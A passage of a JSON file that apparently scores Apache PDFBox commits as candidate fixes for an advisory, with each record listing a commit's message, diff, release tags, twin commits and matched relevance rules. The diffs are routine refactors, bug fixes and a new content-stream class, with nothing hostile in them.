Rectangle2D.Double(minX - pageSize.getLowerLeftX() * m.getScalingFactorX(),", + "+ size.getY() - minY - height + pageSize.getLowerLeftY() * m.getScalingFactorY(),", + " width, height);" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4245": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "929992440df88dcd87bb4b2c605441987f717abd" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4245", + "relevance": 2 + } + ] + }, + { + "commit_id": "fab9c770b55f000effebf5c94d8a1f3d7025261a", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1525957435, + "hunks": 2, + "message": "PDFBOX-4071: refactor the code in order to not assign to this loop counter from within the loop body git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1831337 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "index 2fa470561..f9998e197 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "@@ -499,3 +499,4 @@ public final class PDPageContentStream implements Closeable", + " {", + "- for (int offset = 0; offset < text.length(); )", + "+ int offset = 0;", + "+ while (offset < text.length())", + " {", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java", + "index 15f3783ed..0159d8be3 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java", + "@@ -317,3 +317,4 @@ public abstract class PDFont implements COSObjectable, PDFontLike", + " ByteArrayOutputStream out = new ByteArrayOutputStream();", + "- for (int offset = 0; offset < text.length(); )", + "+ int offset = 0;", + "+ while (offset < text.length())", + " {" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "f7f41c72c849944938bb1a72a6d36e1d4dcdb845" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "c98daf9cc58c415a888535ae7d837267aa7bc133", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529247973, + "hunks": 1, + "message": "PDFBOX-4245: consider translation in xform, as suggested by Jiri Kunhart git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833663 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", + "index 8b0a25235..7b16f95fa 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", + "@@ -1468,4 +1468,5 @@ public class PageDrawer extends PDFGraphicsStreamEngine", + " // Flip y", + "- return new Rectangle2D.Double(minX - pageSize.getLowerLeftX() * m.getScalingFactorX(),", + "- size.getY() - minY - height + pageSize.getLowerLeftY() * m.getScalingFactorY(),", + "+ // PDFBOX-4245 also consider translation in xform", + "+ return new Rectangle2D.Double(minX - pageSize.getLowerLeftX() * m.getScalingFactorX() + xform.getTranslateX(),", + "+ size.getY() - minY - height + pageSize.getLowerLeftY() * m.getScalingFactorY() + xform.getTranslateY(),", + " width, height);" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4245": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "eb0d947c79c412cee8b10fbf7916b4acb8788f5e" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4245", + "relevance": 2 + } + ] + }, + { + "commit_id": "b7ea160c177fb480c2cc41db1e81a47db82e6e24", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524860047, + "hunks": 5, + "message": "PDFBOX-2941: tell field name if we're in a field git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830394 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java b/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java", + "index d58d5befc..f169cbeb2 100644", + "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java", + "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java", + "@@ -49,2 +49,5 @@ import java.awt.image.BufferedImage;", + " import java.io.IOException;", + "+import java.util.HashMap;", + "+import java.util.Map;", + "+import java.util.Map.Entry;", + " import java.util.concurrent.ExecutionException;", + "@@ -52,2 +55,6 @@ import java.util.concurrent.TimeUnit;", + " import org.apache.pdfbox.debugger.ui.HighResolutionImageIcon;", + "+import org.apache.pdfbox.pdmodel.common.PDRectangle;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationWidget;", + "+import org.apache.pdfbox.pdmodel.interactive.form.PDAcroForm;", + "+import org.apache.pdfbox.pdmodel.interactive.form.PDField;", + "@@ -71,2 +78,3 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", + " private String labelText = \"\";", + "+ private final Map rectMap = new HashMap<>();", + "@@ -79,2 +87,23 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", + " initUI();", + "+ initRectMap();", + "+ }", + "+", + "+ private void initRectMap()", + "+ {", + "+ PDAcroForm acroForm = document.getDocumentCatalog().getAcroForm();", + "+ if (acroForm == null)", + "+ {", + "+ return;", + "+ }", + "+ for (PDField field : acroForm.getFieldTree())", + "+ {", + "+ String fullyQualifiedName = field.getFullyQualifiedName();", + "+ for (PDAnnotationWidget widget : field.getWidgets())", + "+ {", + "+ if (page.equals(widget.getPage()))", + "+ {", + "+ rectMap.put(widget.getRectangle(), fullyQualifiedName);", + "+ }", + "+ }", + "+ }", + " }", + "@@ -252,3 +281,15 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", + " }", + "- statuslabel.setText(\"x: \" + x1 + \", y: \" + y1);", + "+ String text = \"x: \" + x1 + \", y: \" + y1;", + "+ ", + "+ // are we in a field widget?", + "+ for (Entry entry : rectMap.entrySet())", + "+ {", + "+ if (entry.getKey().contains(x1, y1))", + "+ {", + "+ text += \", field: \" + rectMap.get(entry.getKey());", + "+ break;", + "+ }", + "+ }", + "+", + "+ statuslabel.setText(text);", + " }" + ], + "changed_files": [ + "debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-2941": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "327767c6c319250abc704a8ae2153a2478d90226" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-2941", + "relevance": 2 + } + ] + }, + { + "commit_id": "9794b68761efe9af95cb046ef4281d1b4705be9c", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524171781, + "hunks": 1, + "message": "PDFBOX-4071: improve error msg git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829616 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", + "index b2ed1ff0b..99c9a6762 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", + "@@ -278,3 +278,4 @@ public class PDFStreamParser extends BaseParser", + " {", + "- throw new IOException( \"Error: Expected operator 'ID' actual='\" + id + \"'\" );", + "+ throw new IOException( \"Error: Expected operator 'ID' actual='\" + id +", + "+ \"' at stream offset \" + seqSource.getPosition());", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "5436705adc08fd2e2ec3ce9e6d9f7b892adf25f7" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: parse", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "3f18c6f77f042dc74fb407fb740ef9c0cc3453ca", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1531171118, + "hunks": 1, + "message": "PDFBOX-4071: improve javadoc git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1835496 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFParser.java b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFParser.java", + "index ea2ed9185..0a212783a 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFParser.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFParser.java", + "@@ -149,3 +149,3 @@ public class PDFParser extends BaseParser", + " *", + "- * @param e The exception if vailable. Can be null if there is no exception available", + "+ * @param e The exception if available. Can be null if there is no exception available", + " * @return true if parsing could be continued, otherwise false" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFParser.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "d0443b775ab6016c70705059c3738ccba2e8d237" + ], + [ + "no-tag", + "f8969cf7c75dd8828006b80fa125f10826bfc695" + ], + [ + "no-tag", + "20591a3f393290bfee28b01192d5ca5b176f57c3" + ], + [ + "no-tag", + "c628b70c3c02f2cea1de87c02a873b73bb8b1976" + ], + [ + "no-tag", + "2f2a6940cc131b86767f3cffe9052687401419ac" + ], + [ + "no-tag", + "5b1b2e07112afc1aac999bc39a282e9049487f26" + ], + [ + "no-tag", + "d7514ffc9679ca69d3948f7da62109b3176d6e97" + ], + [ + "no-tag", + "2c1c8e167764496c9bbd3d25ec8180abc4298514" + ], + [ + "no-tag", + "f394c98fe456aecfa93ca70810dd1f736bb3bbd3" + ], + [ + "no-tag", + "cbd8f0561f06456930e212982b2b8b5a2f1c6730" + ], + [ + "no-tag", + "b99c47e6365654b2c5fcf0cf80b19b971fec3a22" + ], + [ + "no-tag", + "417e6523f71cb4b372e7c2f7d81f04d59b7936f4" + ], + [ + "no-tag", + "7334031821c0e933f1e3e486e907b84d61717d02" + ], + [ + "no-tag", + "278e0dc0aa394464e22d1e879451f4acf54ad5a1" + ], + [ + "no-tag", + "4f031332ed8ffa9c4bf7816340ca6f5f43c94f62" + ] + ], + "tags": [ + "1.8.16", + "1.8.17" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: parse", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "ff1d90e953c5feb60174777459860602548e6865", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528135432, + "hunks": 9, + "message": "PDFBOX-4237: use InputStream instead of PDContentStream git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832873 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/util/RemoveAllText.java b/examples/src/main/java/org/apache/pdfbox/examples/util/RemoveAllText.java", + "index 76dafd5fb..a33bb5b14 100644", + "--- a/examples/src/main/java/org/apache/pdfbox/examples/util/RemoveAllText.java", + "+++ b/examples/src/main/java/org/apache/pdfbox/examples/util/RemoveAllText.java", + "@@ -126,3 +126,3 @@ public final class RemoveAllText", + " {", + "- PDFStreamParser parser = new PDFStreamParser(contentStream);", + "+ PDFStreamParser parser = new PDFStreamParser(contentStream.getContents());", + " Object token = parser.parseNextToken();", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/contentstream/PDFStreamEngine.java b/pdfbox/src/main/java/org/apache/pdfbox/contentstream/PDFStreamEngine.java", + "index 499c7d671..42856b771 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/contentstream/PDFStreamEngine.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/contentstream/PDFStreamEngine.java", + "@@ -487,3 +487,3 @@ public abstract class PDFStreamEngine", + " List arguments = new ArrayList<>();", + "- PDFStreamParser parser = new PDFStreamParser(contentStream);", + "+ PDFStreamParser parser = new PDFStreamParser(contentStream.getContents());", + " Object token = parser.parseNextToken();", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", + "index 99c9a6762..7dc5b144e 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", + "@@ -21,2 +21,3 @@ import java.io.ByteArrayOutputStream;", + " import java.io.IOException;", + "+import java.io.InputStream;", + " import java.util.ArrayList;", + "@@ -25,3 +26,2 @@ import org.apache.commons.logging.Log;", + " import org.apache.commons.logging.LogFactory;", + "-import org.apache.pdfbox.contentstream.PDContentStream;", + " import org.apache.pdfbox.contentstream.operator.Operator;", + "@@ -58,5 +58,5 @@ public class PDFStreamParser extends BaseParser", + " */", + "- public PDFStreamParser(PDContentStream contentStream) throws IOException", + "+ public PDFStreamParser(InputStream stream) throws IOException", + " {", + "- super(new InputStreamSource(contentStream.getContents()));", + "+ super(new InputStreamSource(stream));", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3CharProc.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3CharProc.java", + "index f4793dd99..40a03ffad 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3CharProc.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3CharProc.java", + "@@ -96,3 +96,3 @@ public final class PDType3CharProc implements COSObjectable, PDContentStream", + " List arguments = new ArrayList<>();", + "- PDFStreamParser parser = new PDFStreamParser(this);", + "+ PDFStreamParser parser = new PDFStreamParser(getContents());", + " Object token = parser.parseNextToken();", + "@@ -151,3 +151,3 @@ public final class PDType3CharProc implements COSObjectable, PDContentStream", + " List arguments = new ArrayList<>();", + "- PDFStreamParser parser = new PDFStreamParser(this);", + "+ PDFStreamParser parser = new PDFStreamParser(getContents());", + " Object token = parser.parseNextToken();", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", + "index 29b30148b..a8b6ceab7 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", + "@@ -329,3 +329,3 @@ class AppearanceGeneratorHelper", + " {", + "- PDFStreamParser parser = new PDFStreamParser(appearanceStream);", + "+ PDFStreamParser parser = new PDFStreamParser(appearanceStream.getContents());", + " parser.parse();" + ], + "changed_files": [ + "examples/src/main/java/org/apache/pdfbox/examples/util/RemoveAllText.java", + "pdfbox/src/main/java/org/apache/pdfbox/contentstream/PDFStreamEngine.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3CharProc.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4237": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: parse", + "relevance": 4 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4237", + "relevance": 2 + } + ] + }, + { + "commit_id": "bf1a0637a7f6539cc78b139a66ff48c77fe00c61", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1525910461, + "hunks": 25, + "message": "PDFBOX-4068: make PDAbstractContentStream package-private and move its subclasses into the same package git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831291 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", + "new file mode 100644", + "index 000000000..b66e1e0ba", + "--- /dev/null", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", + "@@ -0,0 +1,1587 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+package org.apache.pdfbox.pdmodel;", + "+", + "+import java.awt.Color;", + "+import java.awt.geom.AffineTransform;", + "+import java.io.Closeable;", + "+import java.io.IOException;", + "+import java.io.OutputStream;", + "+import java.text.NumberFormat;", + "+import java.util.Locale;", + "+import java.util.Stack;", + "+import org.apache.pdfbox.cos.COSBase;", + "+import org.apache.pdfbox.cos.COSName;", + "+import org.apache.pdfbox.cos.COSNumber;", + "+import org.apache.pdfbox.pdfwriter.COSWriter;", + "+import org.apache.pdfbox.pdmodel.documentinterchange.markedcontent.PDPropertyList;", + "+import org.apache.pdfbox.pdmodel.font.PDFont;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDColorSpace;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceCMYK;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceGray;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceN;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceRGB;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDICCBased;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDPattern;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDSeparation;", + "+import org.apache.pdfbox.pdmodel.graphics.form.PDFormXObject;", + "+import org.apache.pdfbox.pdmodel.graphics.image.PDImageXObject;", + "+import org.apache.pdfbox.pdmodel.graphics.image.PDInlineImage;", + "+import org.apache.pdfbox.pdmodel.graphics.shading.PDShading;", + "+import org.apache.pdfbox.pdmodel.graphics.state.PDExtendedGraphicsState;", + "+import org.apache.pdfbox.util.Charsets;", + "+import org.apache.pdfbox.util.Matrix;", + "+import org.apache.pdfbox.util.NumberFormatUtil;", + "+", + "+/**", + "+ * Provides the ability to write to a content stream.", + "+ *", + "+ * @author Ben Litchfield", + "+ */", + "+abstract class PDAbstractContentStream implements Closeable", + "+{", + "+ private OutputStream outputStream;", + "+ private PDResources resources;", + "+", + "+ private boolean inTextMode = false;", + "+ private final Stack fontStack = new Stack<>();", + "+", + "+ private final Stack nonStrokingColorSpaceStack = new Stack<>();", + "+ private final Stack strokingColorSpaceStack = new Stack<>();", + "+", + "+ // number format", + "+ private final NumberFormat formatDecimal = NumberFormat.getNumberInstance(Locale.US);", + "+ private final byte[] formatBuffer = new byte[32];", + "+", + "+ /**", + "+ * Create a new appearance stream.", + "+ *", + "+ */", + "+ public PDAbstractContentStream()", + "+ {", + "+ formatDecimal.setMaximumFractionDigits(4);", + "+ formatDecimal.setGroupingUsed(false);", + "+ }", + "+", + "+ /**", + "+ * Create a new appearance stream.", + "+ * ", + "+ * @param outputStream The appearances output stream to write to.", + "+ */", + "+ public PDAbstractContentStream(OutputStream outputStream)", + "+ {", + "+ this.outputStream = outputStream;", + "+ this.resources = null;", + "+", + "+ formatDecimal.setMaximumFractionDigits(4);", + "+ formatDecimal.setGroupingUsed(false);", + "+ }", + "+", + "+ /**", + "+ * Sets the maximum number of digits allowed for fractional numbers.", + "+ * ", + "+ * @see NumberFormat#setMaximumFractionDigits(int)", + "+ * @param fractionDigitsNumber", + "+ */", + "+ protected void setMaximumFractionDigits(int fractionDigitsNumber)", + "+ {", + "+ formatDecimal.setMaximumFractionDigits(fractionDigitsNumber);", + "+ }", + "+ ", + "+ public OutputStream getOutputStream()", + "+ {", + "+ return outputStream;", + "+ }", + "+", + "+ public void setOutputStream(OutputStream outputStream)", + "+ {", + "+ this.outputStream = outputStream;", + "+ }", + "+ ", + "+ public PDResources getResources()", + "+ {", + "+ return resources;", + "+ }", + "+ ", + "+ public final void setResources(PDResources resources)", + "+ {", + "+ this.resources = resources;", + "+ }", + "+ ", + "+ public Stack getStrokingColorSpaceStack()", + "+ {", + "+ return strokingColorSpaceStack;", + "+ }", + "+", + "+ public Stack getNonStrokingColorSpaceStack()", + "+ {", + "+ return nonStrokingColorSpaceStack;", + "+ }", + "+", + "+ ", + "+ public boolean isInTextMode()", + "+ {", + "+ return inTextMode;", + "+ }", + "+", + "+ /**", + "+ * Begin some text operations.", + "+ *", + "+ * @throws IOException If there is an error writing to the stream or if you attempt to", + "+ * nest beginText calls.", + "+ * @throws IllegalStateException If the method was not allowed to be called at this time.", + "+ */", + "+ public void beginText() throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: Nested beginText() calls are not allowed.\");", + "+ }", + "+ writeOperator(\"BT\");", + "+ inTextMode = true;", + "+ }", + "+", + "+ /**", + "+ * End some text operations.", + "+ *", + "+ * @throws IOException If there is an error writing to the stream or if you attempt to", + "+ * nest endText calls.", + "+ * @throws IllegalStateException If the method was not allowed to be called at this time.", + "+ */", + "+ public void endText() throws IOException", + "+ {", + "+ if (!inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: You must call beginText() before calling endText.\");", + "+ }", + "+ writeOperator(\"ET\");", + "+ inTextMode = false;", + "+ }", + "+ ", + "+ /**", + "+ * Set the font and font size to draw text with.", + "+ *", + "+ * @param font The font to use.", + "+ * @param fontSize The font size to draw the text.", + "+ * @throws IOException If there is an error writing the font information.", + "+ */", + "+ public void setFont(PDFont font, float fontSize) throws IOException", + "+ {", + "+ if (fontStack.isEmpty())", + "+ {", + "+ fontStack.add(font);", + "+ }", + "+ else", + "+ {", + "+ fontStack.setElementAt(font, fontStack.size() - 1);", + "+ }", + "+", + "+ writeOperand(resources.add(font));", + "+ writeOperand(fontSize);", + "+ writeOperator(\"Tf\");", + "+ }", + "+", + "+ /**", + "+ * Shows the given text at the location specified by the current text matrix with the given", + "+ * interspersed positioning. This allows the user to efficiently position each glyph or sequence", + "+ * of glyphs.", + "+ *", + "+ * @param textWithPositioningArray An array consisting of String and Float types. Each String is", + "+ * output to the page using the current text matrix. Using the default coordinate system, each", + "+ * interspersed number adjusts the current text matrix by translating to the left or down for", + "+ * horizontal and vertical text respectively. The number is expressed in thousands of a text", + "+ * space unit, and may be negative.", + "+ *", + "+ * @throws IOException if an io exception occurs.", + "+ */", + "+ public void showTextWithPositioning(Object[] textWithPositioningArray) throws IOException", + "+ {", + "+ write(\"[\");", + "+ for (Object obj : textWithPositioningArray)", + "+ {", + "+ if (obj instanceof String)", + "+ {", + "+ showTextInternal((String) obj);", + "+ }", + "+ else if (obj instanceof Float)", + "+ {", + "+ writeOperand((Float) obj);", + "+ }", + "+ else", + "+ {", + "+ throw new IllegalArgumentException(\"Argument must consist of array of Float and String types\");", + "+ }", + "+ }", + "+ write(\"] \");", + "+ writeOperator(\"TJ\");", + "+ }", + "+", + "+ /**", + "+ * Shows the given text at the location specified by the current text matrix.", + "+ *", + "+ * @param text The Unicode text to show.", + "+ * @throws IOException If an io exception occurs.", + "+ */", + "+ public void showText(String text) throws IOException", + "+ {", + "+ showTextInternal(text);", + "+ write(\" \");", + "+ writeOperator(\"Tj\");", + "+ }", + "+", + "+ /**", + "+ * Outputs a string using the correct encoding and subsetting as required.", + "+ *", + "+ * @param text The Unicode text to show.", + "+ * ", + "+ * @throws IOException If an io exception occurs.", + "+ */", + "+ protected void showTextInternal(String text) throws IOException", + "+ {", + "+ if (!inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Must call beginText() before showText()\");", + "+ }", + "+", + "+ if (fontStack.isEmpty())", + "+ {", + "+ throw new IllegalStateException(\"Must call setFont() before showText()\");", + "+ }", + "+", + "+ PDFont font = fontStack.peek();", + "+", + "+ // Unicode code points to keep when subsetting", + "+ if (font.willBeSubset())", + "+ {", + "+ for (int offset = 0; offset < text.length(); )", + "+ {", + "+ int codePoint = text.codePointAt(offset);", + "+ font.addToSubset(codePoint);", + "+ offset += Character.charCount(codePoint);", + "+ }", 